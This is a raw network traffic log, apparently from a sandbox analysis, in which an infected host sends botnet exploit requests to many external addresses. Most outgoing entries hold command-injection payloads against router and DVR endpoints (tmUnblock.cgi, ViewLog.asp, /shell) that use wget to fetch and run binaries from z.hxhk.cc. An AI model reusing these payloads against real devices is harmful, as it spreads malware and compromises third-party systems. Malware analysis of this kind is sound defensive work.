Mar 18, 2024 09:57:05.170094013 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Mon, 18 Mar 2024 08:57:05 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.23	54576	172.67.213.76	8080

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:05.345772028 CET	124	OUT	POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus. Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.23	36800	172.67.130.105	8080

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:05.345859051 CET	124	OUT	POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus. Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.23	35648	172.66.200.221	8080

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:05.346179962 CET	124	OUT	POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus. Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.23	60514	200.124.245.14	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:05.383758068 CET	454	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you Content-Length: 176 Content-Type: application/x-www-form-urlencoded Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 73 79 73 36 34 2e 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 73 79 73 36 34 2e 61 72 6d 37 3b 2e 2f 73 79 73 36 34 2e 61 72 6d 37 2b 7a 79 2e 73 3b 72 6d 2b 2d 72 66 2b 73 79 73 36 34 2e 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://z.hxhk.cc/sys64.arm7;chmod+777+sys64.arm7;./sys64.arm7+zy.s;rm+-rf+sys64.arm7%3b%23&remoteSubmit=Save
Mar 18, 2024 09:57:05.602005959 CET	410	IN	HTTP/1.1 404 Not Found Date: Sun, 28 Jun 1970 00:23:19 GMT Server: web X-Frame-Options: SAMEORIGIN Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.23	43944	213.189.217.156	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:05.399466038 CET	454	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you Content-Length: 176 Content-Type: application/x-www-form-urlencoded Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 73 79 73 36 34 2e 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 73 79 73 36 34 2e 61 72 6d 37 3b 2e 2f 73 79 73 36 34 2e 61 72 6d 37 2b 7a 79 2e 73 3b 72 6d 2b 2d 72 66 2b 73 79 73 36 34 2e 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://z.hxhk.cc/sys64.arm7;chmod+777+sys64.arm7;./sys64.arm7+zy.s;rm+-rf+sys64.arm7%3b%23&remoteSubmit=Save

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.23	40822	172.67.18.44	8080

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:05.433151960 CET	124	OUT	POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus. Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.23	44242	184.94.139.193	8080

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:05.452347994 CET	112	OUT	POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus. Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.23	59082	82.157.143.52	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:05.471965075 CET	454	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you Content-Length: 176 Content-Type: application/x-www-form-urlencoded Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 73 79 73 36 34 2e 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 73 79 73 36 34 2e 61 72 6d 37 3b 2e 2f 73 79 73 36 34 2e 61 72 6d 37 2b 7a 79 2e 73 3b 72 6d 2b 2d 72 66 2b 73 79 73 36 34 2e 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://z.hxhk.cc/sys64.arm7;chmod+777+sys64.arm7;./sys64.arm7+zy.s;rm+-rf+sys64.arm7%3b%23&remoteSubmit=Save
Mar 18, 2024 09:57:05.774209976 CET	36	IN	HTTP/1.1 404 Not Found Data Raw: Data Ascii:
Mar 18, 2024 09:57:05.774276972 CET	194	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 6e 70 73 20 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>nps error</title></head><body>404 not found,power by <a href="//ehang.io/nps">nps</a></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.23	43630	54.236.148.44	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:05.716902971 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:57:05.810627937 CET	404	IN	HTTP/1.1 400 Bad Request Date: Mon, 18 Mar 2024 08:57:05 GMT Server: Apache Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.23	37622	34.225.83.253	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:05.716958046 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:57:05.811239958 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Mon, 18 Mar 2024 08:57:05 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.23	33696	148.72.72.45	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:05.760879993 CET	231	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:57:06.329540014 CET	1286	IN	HTTP/1.1 404 Not Found Date: Mon, 18 Mar 2024 08:57:05 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store Link: <http://new.watermarkhomeloans.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 62 6f 78 65 64 2d 6c 61 79 6f 75 74 20 73 6b 69 6e 2d 74 65 61 6c 2d 67 72 65 79 20 20 73 74 64 2d 73 65 6c 65 63 74 6f 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 2f 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 2f 3e 0d 0a 3c 21 2d 2d 20 41 64 64 20 47 6f 6f 67 6c 65 20 53 69 74 65 20 56 65 72 69 66 69 63 61 74 69 6f 6e 20 43 6f 64 65 20 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 51 74 6d 51 66 4e 45 33 5f 4f 57 55 35 30 4a 4d 6d 46 45 71 39 46 63 55 57 66 6b 56 38 4c 43 74 62 72 4b 58 44 63 31 6d 4e 77 4d 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 57 61 74 65 72 6d 61 72 6b 20 48 6f 6d 65 20 4c 6f 61 6e 73 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 65 77 2e 77 61 74 65 72 6d 61 72 6b 68 6f 6d 65 6c 6f 61 6e 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6e 65 78 75 73 2f 63 73 73 2f 39 36 30 2f 39 36 30 2e 63 73 73 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 65 77 2e 77 61 74 65 72 6d 61 72 6b 68 6f 6d 65 6c 6f 61 6e 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6e 65 78 75 73 2d 63 68 69 6c 64 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 61 74 65 72 6d 61 72 6b 20 48 6f 6d 65 20 4c 6f 61 6e 73 20 46 65 65 64 22 0d 0a 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 65 77 2e 77 61 74 65 72 6d 61 72 6b 68 6f 6d 65 6c 6f 61 6e 73 2e 63 6f 6d 2f 66 Data Ascii: <!doctype html><html class="no-js boxed-layout skin-teal-grey std-selector" lang="en">...<![endif]--><head><meta http-equiv="X-UA-Compatible" content="IE=edge"/><meta content="text/html; charset=UTF-8" http-equiv="content-type"/>... Add Google Site Verification Code --><meta name="google-site-verification" content="QtmQfNE3_OWU50JMmFEq9FcUWfkV8LCtbrKXDc1mNwM" /> <title>Page not found - Watermark Home Loans</title> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1"> <link rel="stylesheet" href="http://new.watermarkhomeloans.com/wp-content/themes/nexus/css/960/960.css"><link rel="stylesheet" href="http://new.watermarkhomeloans.com/wp-content/themes/nexus-child/style.css"> <link rel="alternate" type="application/rss+xml" title="Watermark Home Loans Feed" href="http://new.watermarkhomeloans.com/f
Mar 18, 2024 09:57:06.329560995 CET	1286	IN	Data Raw: 65 65 64 2f 22 3e 0d 0a 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 6e 65 77 2e 77 61 74 65 72 6d 61 72 6b 68 6f 6d 65 6c 6f 61 6e 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6e 65 78 Data Ascii: eed/"> <script src="http://new.watermarkhomeloans.com/wp-content/themes/nexus/js/libs/modernizr-2.0.6.min.js"></script> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script> <script>window.jQuery \|
Mar 18, 2024 09:57:06.329576969 CET	1286	IN	Data Raw: 64 69 76 2e 63 70 73 6c 69 64 65 72 20 3e 20 64 69 76 2e 73 6c 69 64 65 20 2e 63 70 2d 61 6e 69 6d 2d 69 6d 61 67 65 2c 0d 0a 20 20 20 20 20 20 20 20 64 69 76 2e 63 6f 6e 74 65 6e 74 2d 73 6c 69 64 65 72 20 3e 20 64 69 76 2e 73 6c 69 64 65 20 2e Data Ascii: div.cpslider > div.slide .cp-anim-image, div.content-slider > div.slide .cp-anim-image{ bottom: 0; display: block; vertical-align: bottom; } .long-anim { -webkit-
Mar 18, 2024 09:57:06.329591036 CET	1286	IN	Data Raw: 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 Data Ascii: javascript">window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/new.
Mar 18, 2024 09:57:06.329603910 CET	1286	IN	Data Raw: 38 2c 35 36 34 33 30 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 32 33 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 34 37 5d 29 3b 63 61 73 65 22 65 6d 6f 6a 69 22 3a 72 65 74 75 72 6e 21 73 28 5b 31 30 30 38 34 2c 36 35 30 33 39 2c 38 32 30 35 Data Ascii: 8,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([10084,65039,8205,55357,56613],[10084,65039,8203,55357,56613])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everything
Mar 18, 2024 09:57:06.329622984 CET	1286	IN	Data Raw: 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 35 2e 38 2e 39 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 65 77 2e 77 61 74 65 72 6d 61 72 6b 68 6f 6d 65 6c 6f 61 6e Data Ascii: tyle.min.css?ver=5.8.9"><link rel="stylesheet" href="http://new.watermarkhomeloans.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.4.2"><link rel="stylesheet" href="http://new.watermarkhomeloans.com/wp-content/plugins/mor
Mar 18, 2024 09:57:06.329634905 CET	1286	IN	Data Raw: 76 61 72 20 6c 6f 67 48 75 6d 61 6e 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 69 66 20 28 77 69 6e 64 6f 77 2e 77 66 4c 6f 67 48 75 6d 61 6e 52 61 6e 29 20 7b 20 72 65 74 75 72 6e 3b 20 7d 0a 09 09 77 69 6e 64 6f 77 2e 77 66 4c 6f 67 Data Ascii: var logHuman = function() {if (window.wfLogHumanRan) { return; }window.wfLogHumanRan = true;var wfscr = document.createElement('script');wfscr.type = 'text/javascript';wfscr.async = true;wfscr.src = url + '&r=' + Math.random(
Mar 18, 2024 09:57:06.329665899 CET	1286	IN	Data Raw: 3a 33 30 30 2c 33 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 Data Ascii: :300,300italic,400,300' rel='stylesheet' type='text/css'> <style type="text/css" media="screen"> /* Header Logo */ header div.logo > a, .ie8 header div.logo > a { width: 310px;
Mar 18, 2024 09:57:06.329679012 CET	1286	IN	Data Raw: 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 61 2c 20 61 Data Ascii: } </style> <style type="text/css" media="screen"> a, a:visited, .widget_rss h3 a:hover, body a:hover, body a:visited:hover, .main .tabs > li > a, .tabs > li > a, blockquote, span.pullquote, div.video-embed-shortcode
Mar 18, 2024 09:57:06.329732895 CET	1286	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 2f 2a 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 31 70 78 20 33 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 29 2c 20 30 20 30 20 38 70 78 20 72 67 62 61 28 2c 20 2c 20 2c Data Ascii: /* box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(, , , 0.6);/ } .search-widget > form.search-form > fieldset.has-focus button { / border-color: rgba(, , , 0.8);*/ } </s
Mar 18, 2024 09:57:06.329746962 CET	1286	IN	Data Raw: 20 20 20 20 20 20 20 20 68 2e 68 6a 3d 68 2e 68 6a 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 28 68 2e 68 6a 2e 71 3d 68 2e 68 6a 2e 71 7c 7c 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 3b 0d 0a 20 20 20 20 20 20 20 20 68 2e 5f 68 6a Data Ascii: h.hj=h.hj\|\|function(){(h.hj.q=h.hj.q\|\|[]).push(arguments)}; h._hjSettings={hjid:1040343,hjsv:6}; a=o.getElementsByTagName('head')[0]; r=o.createElement('script');r.async=1; r.src=t+h._hjSettings.hjid

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.23	34490	4.208.29.15	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:05.776909113 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.23	36400	104.17.102.138	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:05.804300070 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.23	54494	150.95.159.115	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:05.893615007 CET	231	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.23	42270	23.192.181.204	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:05.948762894 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:57:06.278733969 CET	431	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 209 Expires: Mon, 18 Mar 2024 08:57:06 GMT Date: Mon, 18 Mar 2024 08:57:06 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 37 35 33 64 37 37 30 26 23 34 36 3b 31 37 31 30 37 35 32 32 32 36 26 23 34 36 3b 36 64 31 38 31 37 34 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "[no URL]", is invalid.<p>Reference #9.c753d770.1710752226.6d181749</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
